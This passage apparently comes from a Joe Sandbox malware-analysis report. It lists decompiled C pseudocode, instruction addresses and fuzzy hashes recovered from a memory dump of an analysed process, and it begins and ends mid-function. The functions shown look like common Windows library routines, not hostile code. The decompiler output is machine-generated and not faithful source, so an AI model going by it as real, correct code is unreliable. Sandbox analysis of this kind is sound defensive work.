								_t17 = _t104 + 0xe; // 0x102bc802
								 *((intOrPtr*)(_t108 + 0x20)) =  *_t15;
								_t85 = 6;
								_v20 = _t85;
								_t87 = E04BFF0BF( &_v20,  *_t17 & 0x0000ffff, __eflags,  &_v28);
								__eflags = _t87;
								if(_t87 < 0) {
									goto L3;
								}
								 *((char*)(_t108 + 0xe)) = 1;
								goto L15;
							}
							__eflags = _t53 - 0xc000026e;
							if(__eflags != 0) {
								goto L3;
							}
							goto L12;
						}
						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
							goto L3;
						} else {
							goto L9;
						}
					}
					L3:
					_t49 = _t104;
					goto L4;
				}
				_t49 = 0;
				goto L4;
			}

























              0x04bc52a5
              0x04bc52ad
              0x04bc52b0
              0x04bc52b3
              0x04bc52b7
              0x04bc52ba
              0x04bc52bf
              0x04bc52c4
              0x04bc52cc
              0x00000000
              0x00000000
              0x04bc52ce
              0x04bc52d1
              0x04bc52d9
              0x04bc52dd
              0x04bc52e7
              0x04bc52f7
              0x04bc52f9
              0x04bc52fd
              0x04c20dcf
              0x04c20dd5
              0x04c20dd6
              0x04c20dd7
              0x04c20dd8
              0x04c20dd9
              0x04c20dde
              0x04c20ddf
              0x04c20de0
              0x04c20de1
              0x04c20de2
              0x04c20de2
              0x04c20de5
              0x04c20dea
              0x04c20dec
              0x04c20f60
              0x04c20f64
              0x04c20f70
              0x04c20f76
              0x04c20f79
              0x04c20f79
              0x00000000
              0x04c20f64
              0x04c20df2
              0x04c20df7
              0x04c20e04
              0x04c20e04
              0x04c20e0d
              0x04c20e0d
              0x04c20e10
              0x04c20e1a
              0x04c20e1c
              0x04c20e4c
              0x04c20e52
              0x04c20e61
              0x04c20e67
              0x04c20e6b
              0x04c20e70
              0x04c20e76
              0x04c20ed7
              0x04c20edc
              0x04c20ee0
              0x04c20ee6
              0x04c20eea
              0x04c20eed
              0x04c20ef0
              0x04c20ef3
              0x04c20ef6
              0x04c20ef9
              0x04c20efb
              0x04c20efe
              0x04c20f01
              0x04c20f01
              0x04c20f0b
              0x04c20f12
              0x04c20f16
              0x04c20f18
              0x04c20f18
              0x04c20f1b
              0x04c20f2c
              0x04c20f31
              0x04c20f31
              0x04c20f35
              0x04c20f39
              0x04c20f3a
              0x04c20f3c
              0x04c20f3c
              0x04c20f3f
              0x04c20f50
              0x04c20f55
              0x04c20f55
              0x04c20f59
              0x04bc52eb
              0x04bc52f1
              0x04bc52f1
              0x04c20e7d
              0x04c20e84
              0x04c20e88
              0x04c20e8a
              0x04c20e8a
              0x04c20e8d
              0x04c20e9e
              0x04c20ea3
              0x04c20ea3
              0x04c20ea7
              0x04c20eaf
              0x04c20eb3
              0x04c20eb9
              0x04c20eb9
              0x04c20ebc
              0x04c20ecd
              0x04c20ecd
              0x00000000
              0x04c20eb3
              0x04c20e1e
              0x04c20e21
              0x04c20e25
              0x04c20e2b
              0x04c20e2f
              0x04c20e30
              0x04c20e3a
              0x04c20e3f
              0x04c20e41
              0x00000000
              0x00000000
              0x04c20e47
              0x00000000
              0x04c20e47
              0x04c20df9
              0x04c20dfe
              0x00000000
              0x00000000
              0x00000000
              0x04c20dfe
              0x04bc5303
              0x04bc5307
              0x00000000
              0x04bc5309
              0x00000000
              0x04bc5309
              0x04bc5307
              0x04bc52e9
              0x04bc52e9
              0x00000000
              0x04bc52e9
              0x04bc530e
              0x00000000

              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 55423b027b42154ae40e285013e32fa5aac4663480b47693450133e97f2649f6
              • Instruction ID: 7eee85a33d21a3e5e9ad41d3a9fe7acf6e1a2f17a3f143e17ccd0d337aa588b1
              • Opcode Fuzzy Hash: 55423b027b42154ae40e285013e32fa5aac4663480b47693450133e97f2649f6
              • Instruction Fuzzy Hash: FB510F70206751AFEB20EF25C981B27BBE6FF80714F10495EE5958B690E7B0F840CB92
              Uniqueness

              Uniqueness Score: -1.00%

              Function 04BDEF40 Relevance: .1, Instructions: 147COMMON
              Download Yara Rule
              C-Code - Quality: 96%
              			E04BDEF40(intOrPtr __ecx) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t58;
				char _t59;
				signed char _t69;
				void* _t73;
				signed int _t74;
				char _t79;
				signed char _t81;
				signed int _t85;
				signed int _t87;
				intOrPtr _t90;
				signed char* _t91;
				void* _t92;
				signed int _t94;
				void* _t96;

				_t90 = __ecx;
				_v16 = __ecx;
				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
					_t58 =  *((intOrPtr*)(__ecx));
					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
						E04BC9080(_t73, __ecx, __ecx, _t92);
					}
				}
				_t74 = 0;
				_t96 =  *0x7ffe036a - 1;
				_v12 = 0;
				_v7 = 0;
				if(_t96 > 0) {
					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
					_v12 = _t74;
					_v7 = _t96 != 0;
				}
				_t79 = 0;
				_v8 = 0;
				_v5 = 0;
				while(1) {
					L4:
					_t59 = 1;
					L5:
					while(1) {
						if(_t59 == 0) {
							L12:
							_t21 = _t90 + 4; // 0x7738c21e
							_t87 =  *_t21;
							_v6 = 0;
							if(_t79 != 0) {
								if((_t87 & 0x00000002) != 0) {
									goto L19;
								}
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000003;
								} else {
									_t51 = _t87 - 2; // -2
									_t74 = _t51;
								}
								goto L15;
							} else {
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000001;
								} else {
									_t26 = _t87 - 4; // -4
									_t74 = _t26;
									if((_t74 & 0x00000002) == 0) {
										_t74 = _t74 - 2;
									}
								}
								L15:
								if(_t74 == _t87) {
									L19:
									E04BC2D8A(_t74, _t90, _t87, _t90);
									_t74 = _v12;
									_v8 = 1;
									if(_v7 != 0 && _t74 > 0x64) {
										_t74 = _t74 - 1;
										_v12 = _t74;
									}
									_t79 = _v5;
									goto L4;
								}
								asm("lock cmpxchg [esi], ecx");
								if(_t87 != _t87) {
									_t74 = _v12;
									_t59 = 0;
									_t79 = _v5;
									continue;
								}
								if(_v6 != 0) {
									_t74 = _v12;
									L25:
									if(_v7 != 0) {
										if(_t74 < 0x7d0) {
											if(_v8 == 0) {
												_t74 = _t74 + 1;
											}
										}
										_t38 = _t90 + 0x14; // 0x0
										_t39 = _t90 + 0x14; // 0x0
										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
											_t85 = _t85 & 0xff000000;
										}
										 *(_t90 + 0x14) = _t85;
									}
									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
									 *((intOrPtr*)(_t90 + 8)) = 1;
									return 0;
								}
								_v5 = 1;
								_t87 = _t74;
								goto L19;
							}
						}
						_t94 = _t74;
						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
						if(_t74 == 0) {
							goto L12;
						} else {
							_t91 = _t90 + 4;
							goto L8;
							L9:
							while((_t81 & 0x00000001) != 0) {
								_t69 = _t81;
								asm("lock cmpxchg [edi], edx");
								if(_t69 != _t81) {
									_t81 = _t69;
									continue;
								}
								_t90 = _v16;
								goto L25;
							}
							asm("pause");
							_t94 = _t94 - 1;
							if(_t94 != 0) {
								L8:
								_t81 =  *_t91;
								goto L9;
							} else {
								_t90 = _v16;
								_t79 = _v5;
								goto L12;
							}
						}
					}
				}
			}




























              0x04bdef4b
              0x04bdef4d
              0x04bdef57
              0x04bdf0bd
              0x04bdf0c2
              0x04bdf0d2
              0x04bdf0d2
              0x04bdf0c2
              0x04bdef5d
              0x04bdef5f
              0x04bdef67
              0x04bdef6a
              0x04bdef6d
              0x04bdef74
              0x04bdef7f
              0x04bdef82
              0x04bdef82
              0x04bdef86
              0x04bdef88
              0x04bdef8c
              0x04bdef8f
              0x04bdef8f
              0x04bdef8f
              0x00000000
              0x04bdef91
              0x04bdef93
              0x04bdefc4
              0x04bdefc4
              0x04bdefc4
              0x04bdefca
              0x04bdefd0
              0x04bdf0a6
              0x00000000
              0x00000000
              0x04bdf0af
              0x04c2bb06
              0x04c2bb0a
              0x04bdf0b5
              0x04bdf0b5
              0x04bdf0b5
              0x04bdf0b5
              0x00000000
              0x04bdefd6
              0x04bdefd9
              0x04bdf0de
              0x04bdf0e2
              0x04bdefdf
              0x04bdefdf
              0x04bdefdf
              0x04bdefe5
              0x04c2bafc
              0x04c2bafc
              0x04bdefe5
              0x04bdefeb
              0x04bdefed
              0x04bdf00f
              0x04bdf011
              0x04bdf01a
              0x04bdf01d
              0x04bdf021
              0x04bdf028
              0x04bdf029
              0x04bdf029
              0x04bdf02c
              0x00000000
              0x04bdf02c
              0x04bdeff3
              0x04bdeff9
              0x04bdf0ea
              0x04bdf0ed
              0x04bdf0ef
              0x00000000
              0x04bdf0ef
              0x04bdf003
              0x04c2bb12
              0x04bdf045
              0x04bdf049
              0x04bdf051
              0x04bdf09e
              0x04bdf0a0
              0x04bdf0a0
              0x04bdf09e
              0x04bdf053
              0x04bdf064
              0x04bdf064
              0x04bdf06b
              0x04c2bb1a
              0x04c2bb1a
              0x04bdf071
              0x04bdf071
              0x04bdf07d
              0x04bdf082
              0x04bdf08f
              0x04bdf08f
              0x04bdf009
              0x04bdf00d
              0x00000000
              0x04bdf00d
              0x04bdefd0
              0x04bdef97
              0x04bdefa5
              0x04bdefaa
              0x00000000
              0x04bdefac
              0x04bdefac
              0x04bdefac
              0x00000000
              0x04bdefb2
              0x04bdf036
              0x04bdf03a
              0x04bdf040
              0x04bdf090
              0x00000000
              0x04bdf092
              0x04bdf042
              0x00000000
              0x04bdf042
              0x04bdefb7
              0x04bdefb9
              0x04bdefbc
              0x04bdefb0
              0x04bdefb0
              0x00000000
              0x04bdefbe
              0x04bdefbe
              0x04bdefc1
              0x00000000
              0x04bdefc1
              0x04bdefbc
              0x04bdefaa
              0x04bdef91

              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
              • Instruction ID: 31fbbf3c63c6555d29c48bb02be9856b335504a4f463406dc5e94b00268e43ec
              • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
              • Instruction Fuzzy Hash: 7151C230A08645DFEB18CF68C1D07AEBBB1EF05314F1881E8D5565B281F375B989D751
              Uniqueness

              Uniqueness Score: -1.00%

              Function 04C9740D Relevance: .1, Instructions: 141COMMON
              Download Yara Rule
              C-Code - Quality: 84%
              			E04C9740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _t55;
				void* _t56;
				intOrPtr* _t66;
				intOrPtr* _t69;
				void* _t74;
				intOrPtr* _t78;
				intOrPtr* _t81;
				intOrPtr* _t82;
				intOrPtr _t83;
				signed short* _t84;
				intOrPtr _t85;
				signed int _t87;
				intOrPtr* _t90;
				intOrPtr* _t93;
				intOrPtr* _t94;
				void* _t98;

				_t84 = __edx;
				_t80 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t55 = __ecx;
				_v8 = __edx;
				_t87 =  *__edx & 0x0000ffff;
				_v12 = __ecx;
				_t3 = _t55 + 0x154; // 0x154
				_t93 = _t3;
				_t78 =  *_t93;
				_t4 = _t87 + 2; // 0x2
				_t56 = _t4;
				while(_t78 != _t93) {
					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
						L4:
						_t78 =  *_t78;
						continue;
					} else {
						_t7 = _t78 + 0x18; // 0x18
						if(E04C1D4F0(_t7, _t84[2], _t87) == _t87) {
							_t40 = _t78 + 0xc; // 0xc
							_t94 = _t40;
							_t90 =  *_t94;
							while(_t90 != _t94) {
								_t41 = _t90 + 8; // 0x8
								_t74 = E04C0F380(_a4, _t41, 0x10);
								_t98 = _t98 + 0xc;
								if(_t74 != 0) {
									_t90 =  *_t90;
									continue;
								}
								goto L12;
							}
							_t82 = L04BE4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
							if(_t82 != 0) {
								_t46 = _t78 + 0xc; // 0xc
								_t69 = _t46;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t85 =  *_t69;
								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
									L20:
									_t82 = 3;
									asm("int 0x29");
								}
								 *((intOrPtr*)(_t82 + 4)) = _t69;
								 *_t82 = _t85;
								 *((intOrPtr*)(_t85 + 4)) = _t82;
								 *_t69 = _t82;
								 *(_t78 + 8) =  *(_t78 + 8) + 1;
								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
								goto L11;
							} else {
								L18:
								_push(0xe);
								_pop(0);
							}
						} else {
							_t84 = _v8;
							_t9 = _t87 + 2; // 0x2
							_t56 = _t9;
							goto L4;
						}
					}
					L12:
					return 0;
				}
				_t10 = _t87 + 0x1a; // 0x1a
				_t78 = L04BE4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
				if(_t78 == 0) {
					goto L18;
				} else {
					_t12 = _t87 + 2; // 0x2
					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
					_t16 = _t78 + 0x18; // 0x18
					E04C0F3E0(_t16, _v8[2], _t87);
					 *((short*)(_t78 + _t87 + 0x18)) = 0;
					_t19 = _t78 + 0xc; // 0xc
					_t66 = _t19;
					 *((intOrPtr*)(_t66 + 4)) = _t66;
					 *_t66 = _t66;
					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
					_t81 = L04BE4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
					if(_t81 == 0) {
						goto L18;
					} else {
						_t26 = _t78 + 0xc; // 0xc
						_t69 = _t26;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t85 =  *_t69;
						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
							goto L20;
						} else {
							 *((intOrPtr*)(_t81 + 4)) = _t69;
							 *_t81 = _t85;
							 *((intOrPtr*)(_t85 + 4)) = _t81;
							 *_t69 = _t81;
							_t83 = _v12;
							 *(_t78 + 8) = 1;
							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							_t34 = _t83 + 0x154; // 0x1ba
							_t69 = _t34;
							_t85 =  *_t69;
							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
								goto L20;
							} else {
								 *_t78 = _t85;
								 *((intOrPtr*)(_t78 + 4)) = _t69;
								 *((intOrPtr*)(_t85 + 4)) = _t78;
								 *_t69 = _t78;
								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							}
						}
						goto L11;
					}
				}
				goto L12;
			}





















              0x04c9740d
              0x04c9740d
              0x04c97412
              0x04c97413
              0x04c97416
              0x04c97418
              0x04c9741c
              0x04c9741f
              0x04c97422
              0x04c97422
              0x04c97428
              0x04c9742a
              0x04c9742a
              0x04c97451
              0x04c97432
              0x04c9744f
              0x04c9744f
              0x00000000
              0x04c97434
              0x04c97438
              0x04c97443
              0x04c97517
              0x04c97517
              0x04c9751a
              0x04c97535
              0x04c97520
              0x04c97527
              0x04c9752c
              0x04c97531
              0x04c97533
              0x00000000
              0x04c97533
              0x00000000
              0x04c97531
              0x04c9754b
              0x04c9754f
              0x04c9755c
              0x04c9755c
              0x04c9755f
              0x04c97560
              0x04c97561
              0x04c97562
              0x04c97563
              0x04c97568
              0x04c9756a
              0x04c9756c
              0x04c9756d
              0x04c9756d
              0x04c9756f
              0x04c97572
              0x04c97574
              0x04c97577
              0x04c9757c
              0x04c9757f
              0x00000000
              0x04c97551
              0x04c97551
              0x04c97551
              0x04c97553
              0x04c97553
              0x04c97449
              0x04c97449
              0x04c9744c
              0x04c9744c
              0x00000000
              0x04c9744c
              0x04c97443
              0x04c9750e
              0x04c97514
              0x04c97514
              0x04c97455
              0x04c97469
              0x04c9746d
              0x00000000
              0x04c97473
              0x04c97473
              0x04c97476
              0x04c97480
              0x04c97484
              0x04c9748e
              0x04c97493
              0x04c97493
              0x04c97496
              0x04c97499
              0x04c974a1
              0x04c974b1
              0x04c974b5
              0x00000000
              0x04c974bb
              0x04c974c1
              0x04c974c1
              0x04c974c4
              0x04c974c5
              0x04c974c6
              0x04c974c7
              0x04c974c8
              0x04c974cd
              0x00000000
              0x04c974d3
              0x04c974d3
              0x04c974d6
              0x04c974d8
              0x04c974db
              0x04c974dd
              0x04c974e0
              0x04c974e7
              0x04c974ee
              0x04c974ee
              0x04c974f4
              0x04c974f9
              0x00000000
              0x04c974fb
              0x04c974fb
              0x04c974fd
              0x04c97500
              0x04c97503
              0x04c97505
              0x04c97505
              0x04c974f9
              0x00000000
              0x04c974cd
              0x04c974b5
              0x00000000

              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
              • Instruction ID: 470f4ad4b0fbe141d254a1a332b3ae73d7514693fae2d1788005e7f303909157
              • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
              • Instruction Fuzzy Hash: 6C517B71602606EFDF55CF54C484A56BBF6FF45304F18C0AAE9089F252E371EA46CB90
              Uniqueness

              Uniqueness Score: -1.00%

              Function 04BF4D3B Relevance: .1, Instructions: 131COMMON
              Download Yara Rule
              C-Code - Quality: 78%
              			E04BF4D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				char _v176;
				char _v177;
				char _v184;
				intOrPtr _v192;
				intOrPtr _v196;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t42;
				char* _t44;
				intOrPtr _t46;
				intOrPtr _t50;
				char* _t57;
				intOrPtr _t59;
				intOrPtr _t67;
				signed int _t69;

				_t64 = __edx;
				_v12 =  *0x4cbd360 ^ _t69;
				_t65 = 0xa0;
				_v196 = __edx;
				_v177 = 0;
				_t67 = __ecx;
				_v192 = __ecx;
				E04C0FA60( &_v176, 0, 0xa0);
				_t57 =  &_v176;
				_t59 = 0xa0;
				if( *0x4cb7bc8 != 0) {
					L3:
					while(1) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t67 = _v192;
						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
						_push( &_v184);
						_push(_t59);
						_push(_t57);
						_push(0xa0);
						_push(_t57);
						_push(0xf);
						_t42 = E04C0B0B0();
						if(_t42 != 0xc0000023) {
							break;
						}
						if(_v177 != 0) {
							L04BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
						}
						_v177 = 1;
						_t44 = L04BE4620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
						_t59 = _v184;
						_t57 = _t44;
						if(_t57 != 0) {
							continue;
						} else {
							_t42 = 0xc0000017;
							break;
						}
					}
					if(_t42 != 0) {
						_t65 = E04BCCCC0(_t42);
						if(_t65 != 0) {
							L10:
							if(_v177 != 0) {
								if(_t57 != 0) {
									L04BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
								}
							}
							_t46 = _t65;
							L12:
							return E04C0B640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
						}
						L7:
						_t50 = _a4;
						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
						if(_t50 != 3) {
							if(_t50 == 2) {
								goto L8;
							}
							L9:
							if(E04C0F380(_t67 + 0xc, 0x4ba5138, 0x10) == 0) {
								 *0x4cb60d8 = _t67;
							}
							goto L10;
						}
						L8:
						_t64 = _t57 + 0x28;
						E04BF4F49(_t67, _t57 + 0x28);
						goto L9;
					}
					_t65 = 0;
					goto L7;
				}
				if(E04BF4E70(0x4cb86b0, 0x4bf5690, 0, 0) != 0) {
					_t46 = E04BCCCC0(_t56);
					goto L12;
				} else {
					_t59 = 0xa0;
					goto L3;
				}
			}




















              0x04bf4d3b
              0x04bf4d4d
              0x04bf4d53
              0x04bf4d58
              0x04bf4d65
              0x04bf4d6c
              0x04bf4d71
              0x04bf4d77
              0x04bf4d7f
              0x04bf4d8c
              0x04bf4d8e
              0x04bf4dad
              0x04bf4db0
              0x04bf4db7
              0x04bf4db8
              0x04bf4db9
              0x04bf4dba
              0x04bf4dbb
              0x04bf4dc1
              0x04bf4dc8
              0x04bf4dcc
              0x04bf4dd5
              0x04bf4dde
              0x04bf4ddf
              0x04bf4de0
              0x04bf4de1
              0x04bf4de6
              0x04bf4de7
              0x04bf4de9
              0x04bf4df3
              0x00000000
              0x00000000
              0x04c36c7c
              0x04c36c8a
              0x04c36c8a
              0x04c36c9d
              0x04c36ca7
              0x04c36cac
              0x04c36cb2
              0x04c36cb9
              0x00000000
              0x04c36cbf
              0x04c36cbf
              0x00000000
              0x04c36cbf
              0x04c36cb9
              0x04bf4dfb
              0x04c36ccf
              0x04c36cd3
              0x04bf4e32
              0x04bf4e39
              0x04c36ce0
              0x04c36cf2
              0x04c36cf2
              0x04c36ce0
              0x04bf4e3f
              0x04bf4e41
              0x04bf4e51
              0x04bf4e51
              0x04bf4e03
              0x04bf4e03
              0x04bf4e09
              0x04bf4e0f
              0x04bf4e57
              0x00000000
              0x00000000
              0x04bf4e1b
              0x04bf4e30
              0x04bf4e5b
              0x04bf4e5b
              0x00000000
              0x04bf4e30
              0x04bf4e11
              0x04bf4e11
              0x04bf4e16
              0x00000000
              0x04bf4e16
              0x04bf4e01
              0x00000000
              0x04bf4e01
              0x04bf4da5
              0x04c36c6b
              0x00000000
              0x04bf4dab
              0x04bf4dab
              0x00000000
              0x04bf4dab

              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 012b529f92b19d84292d6fbe3ed59babcfebd5321fa8c78a7928bd2f04357934
              • Instruction ID: d5eac3f83b856f71d202b71bab66ab9db00d7cae66c9135a823b99b459b46e25
              • Opcode Fuzzy Hash: 012b529f92b19d84292d6fbe3ed59babcfebd5321fa8c78a7928bd2f04357934
              • Instruction Fuzzy Hash: 1641E175B00318AFEB35DF14CD80BABB7AAEB54614F0044E9EA4997280E774FD488A91
              Uniqueness

              Uniqueness Score: -1.00%

              Function 04C03D43 Relevance: .1, Instructions: 106COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E04C03D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				char _v12;
				signed short** _t33;
				short* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				signed short _t43;
				intOrPtr* _t47;
				intOrPtr* _t53;
				signed short _t57;
				intOrPtr _t58;
				signed short _t60;
				signed short* _t61;

				_t47 = __ecx;
				_t61 = __edx;
				_t60 = ( *__ecx & 0x0000ffff) + 2;
				if(_t60 > 0xfffe) {
					L22:
					return 0xc0000106;
				}
				if(__edx != 0) {
					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
						L5:
						E04BD7B60(0, _t61, 0x4ba11c4);
						_v12 =  *_t47;
						_v12 = _v12 + 0xfff8;
						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
						E04BD7B60(0xfff8, _t61,  &_v12);
						_t33 = _a8;
						if(_t33 != 0) {
							 *_t33 = _t61;
						}
						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
						_t53 = _a12;
						if(_t53 != 0) {
							_t57 = _t61[2];
							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
							while(_t38 >= _t57) {
								if( *_t38 == 0x5c) {
									_t41 = _t38 + 2;
									if(_t41 == 0) {
										break;
									}
									_t58 = 0;
									if( *_t41 == 0) {
										L19:
										 *_t53 = _t58;
										goto L7;
									}
									 *_t53 = _t41;
									goto L7;
								}
								_t38 = _t38 - 2;
							}
							_t58 = 0;
							goto L19;
						} else {
							L7:
							_t39 = _a16;
							if(_t39 != 0) {
								 *_t39 = 0;
								 *((intOrPtr*)(_t39 + 4)) = 0;
								 *((intOrPtr*)(_t39 + 8)) = 0;
								 *((intOrPtr*)(_t39 + 0xc)) = 0;
							}
							return 0;
						}
					}
					_t61 = _a4;
					if(_t61 != 0) {
						L3:
						_t43 = L04BE4620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
						_t61[2] = _t43;
						if(_t43 == 0) {
							return 0xc0000017;
						}
						_t61[1] = _t60;
						 *_t61 = 0;
						goto L5;
					}
					goto L22;
				}
				_t61 = _a4;
				if(_t61 == 0) {
					return 0xc000000d;
				}
				goto L3;
			}
















              0x04c03d4c
              0x04c03d50
              0x04c03d55
              0x04c03d5e
              0x04c3e79a
              0x00000000
              0x04c3e79a
              0x04c03d68
              0x04c3e789
              0x04c03d9d
              0x04c03da3
              0x04c03daf
              0x04c03db5
              0x04c03dbc
              0x04c03dc4
              0x04c03dc9
              0x04c03dce
              0x04c3e7ae
              0x04c3e7ae
              0x04c03dde
              0x04c03de2
              0x04c03de7
              0x04c03e0d
              0x04c03e13
              0x04c03e16
              0x04c03e1e
              0x04c03e25
              0x04c03e28
              0x00000000
              0x00000000
              0x04c03e2a
              0x04c03e2f
              0x04c03e37
              0x04c03e37
              0x00000000
              0x04c03e37
              0x04c03e31
              0x00000000
              0x04c03e31
              0x04c03e20
              0x04c03e20
              0x04c03e35
              0x00000000
              0x04c03de9
              0x04c03de9
              0x04c03de9
              0x04c03dee
              0x04c03dfd
              0x04c03dff
              0x04c03e02
              0x04c03e05
              0x04c03e05
              0x00000000
              0x04c03df0
              0x04c03de7
              0x04c3e78f
              0x04c3e794
              0x04c03d79
              0x04c03d84
              0x04c03d89
              0x04c03d8e
              0x00000000
              0x04c3e7a4
              0x04c03d96
              0x04c03d9a
              0x00000000
              0x04c03d9a
              0x00000000
              0x04c3e794
              0x04c03d6e
              0x04c03d73
              0x00000000
              0x04c3e7b5
              0x00000000

              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 17915155a1173d5896de913ac485ed85b6e2bbc5ea5d64c02a8690cb8e2501c5
              • Instruction ID: 60122b42fecbaceb31cb6078f4e9c9ff5e920532767dc0798c5e592e05106f16
              • Opcode Fuzzy Hash: 17915155a1173d5896de913ac485ed85b6e2bbc5ea5d64c02a8690cb8e2501c5
              • Instruction Fuzzy Hash: B2319031715665DFD7258F2AC841A7ABBE6EF56700B09C46AE845CB3A0F730E940D790
              Uniqueness

              Uniqueness Score: -1.00%

              Function 04C47016 Relevance: .1, Instructions: 104COMMON
              Download Yara Rule
              C-Code - Quality: 76%
              			E04C47016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
				signed int _v8;
				char _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				signed short* _v600;
				char _v604;
				short _v606;
				void* __ebx;
